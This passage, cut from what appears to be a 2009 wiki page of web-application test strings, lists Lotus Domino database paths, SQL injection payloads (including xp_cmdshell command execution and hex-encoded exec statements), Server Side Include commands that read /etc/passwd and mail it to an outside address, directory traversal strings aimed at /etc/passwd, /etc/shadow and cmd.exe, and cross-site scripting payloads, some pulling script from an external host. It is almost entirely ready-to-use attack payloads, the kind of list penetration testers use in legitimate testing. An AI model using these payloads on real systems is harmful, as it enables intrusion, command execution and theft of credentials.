/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
